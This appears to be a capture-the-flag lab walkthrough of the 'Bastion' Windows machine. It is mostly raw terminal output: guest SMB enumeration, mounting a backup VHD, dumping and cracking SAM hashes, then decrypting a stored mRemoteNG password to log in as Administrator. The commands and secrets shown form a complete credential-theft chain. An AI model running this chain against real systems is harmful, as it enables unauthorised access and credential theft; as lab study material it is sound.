PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-09-23T05:44:44
|_  start_date: 2025-09-23T02:36:12
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-09-23T07:44:41+02:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -38m56s, deviation: 1h09m15s, median: 1m02s

─$ netexec smb 10.10.10.134 -u guest -p '' --shares
SMB         10.10.10.134    445    BASTION          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.10.10.134    445    BASTION          [+] Bastion\guest: 
SMB         10.10.10.134    445    BASTION          [*] Enumerated shares
SMB         10.10.10.134    445    BASTION          Share           Permissions     Remark
SMB         10.10.10.134    445    BASTION          -----           -----------     ------
SMB         10.10.10.134    445    BASTION          ADMIN$                          Remote Admin
SMB         10.10.10.134    445    BASTION          Backups         READ,WRITE      
SMB         10.10.10.134    445    BASTION          C$                              Default share
SMB         10.10.10.134    445    BASTION          IPC$            READ            Remote IPC

└─$ smbclient //10.10.10.134/Backups --user=guest --password= ''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 23 15:46:55 2025
  ..                                  D        0  Tue Sep 23 15:46:55 2025
  FKpuytGnVj.txt                      A        0  Tue Sep 23 15:46:55 2025
  note.txt                           AR      116  Tue Apr 16 20:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 23:43:08 2019
  vUJcmzGFjo                          D        0  Tue Sep 23 15:46:53 2025
  WindowsImageBackup                 Dn        0  Fri Feb 22 23:44:02 2019

more note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

smb: \WindowsImageBackup\L4mpje-PC\> ls
  .                                  Dn        0  Fri Feb 22 23:45:32 2019
  ..                                 Dn        0  Fri Feb 22 23:45:32 2019
  Backup 2019-02-22 124351           Dn        0  Fri Feb 22 23:45:32 2019
  Catalog                            Dn        0  Fri Feb 22 23:45:32 2019
  MediaId                            An       16  Fri Feb 22 23:44:02 2019
  SPPMetadataCache                   Dn        0  Fri Feb 22 23:45:32 2019


  └─$ sudo mount -t cifs -o username=guest //10.10.10.134/Backups/ /mnt/smbshare 
Password for guest@//10.10.10.134/Backups/: 

┌──(ed㉿kali)-[/mnt/smbshare]
└─$ ls
FKpuytGnVj.txt  SDT65CB.tmp  WindowsImageBackup  note.txt  vUJcmzGFjo

──(ed㉿kali)-[/mnt/smbshare/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
└─$ ls    
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
BackupSpecs.xml
cd113385-65ff-4ea2-8ced-5630f6feca8f_Ad

//use guestmount to mount the vhd into my disk

guestmount --add /mnt/smbshare/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2 -v

inspect_os: fses:
fs: /dev/sda1 (ntfs) role: other
inspect_get_roots: roots:
guestfsd: => inspect_os (0x1e0) took 15.80 secs
guestmount: no operating system was found on this disk

sudo guestmount --add /mnt/smbshare/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2 -v


┌──(root㉿kali)-[/tmp/vhd/Windows/System32/config]
└─# impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up... 

┌──(ed㉿kali)-[/tmp]
└─$ john --wordlist=~/tools/rockyou.txt hashes
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (LM [DES 256/256 AVX2])
No password hashes left to crack (see FAQ)
                                                                                                    
┌──(ed㉿kali)-[/tmp]
└─$ john --format=NT --wordlist=~/tools/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)     
bureaulampje     (L4mpje)     
2g 0:00:00:00 DONE (2025-09-26 15:58) 5.000g/s 23488Kp/s 23488Kc/s 23500KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 

evil-winrm is not allowed to login, try ssh
Microsoft Windows [Version 10.0.14393]                                                              
(c) 2016 Microsoft Corporation. All rights reserved.                                                

l4mpje@BASTION C:\Users\L4mpje>whoami                                                               
bastion\l4mpje 

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt                                                
e2ec1cc73811fbb


// in program file folder, find a special software.  google it , and check some info in C:\Users\L4mpje\AppData\Roaming\mRemoteNG.


PS C:\Users\L4mpje\AppData\Roaming\mRemoteNG> more .\confCons.xml                                   
<?xml version="1.0" encoding="utf-8"?>                                                              
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngi
ne="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224
Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">  
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44
d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeo
C0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySe
ssion="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE"
 ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAl
ertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticRes
ize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopC
omposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPri
nters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKe
ys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCComp
ression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyI
P="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode
="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseCo
nnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheB
itmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" Inherit
DisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" 
InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="
false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" Inherit
RedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSma
rtCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" I
nheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRend
eringEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthentic
ationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" Inherit
LoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false"
 InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="fa
lse" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProx
yPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="fals
e" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" In
heritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUser
name="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />  

//we get id/pass pair Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeo
C0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

//it is a encrypted pass, https://github.com/kmahyyg/mremoteng-decrypt

python3 mremoteng_decrypt\ \(1\).py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeo
C0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2

➜  /tmp ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                              
(c) 2016 Microsoft Corporation. All rights reserved.   
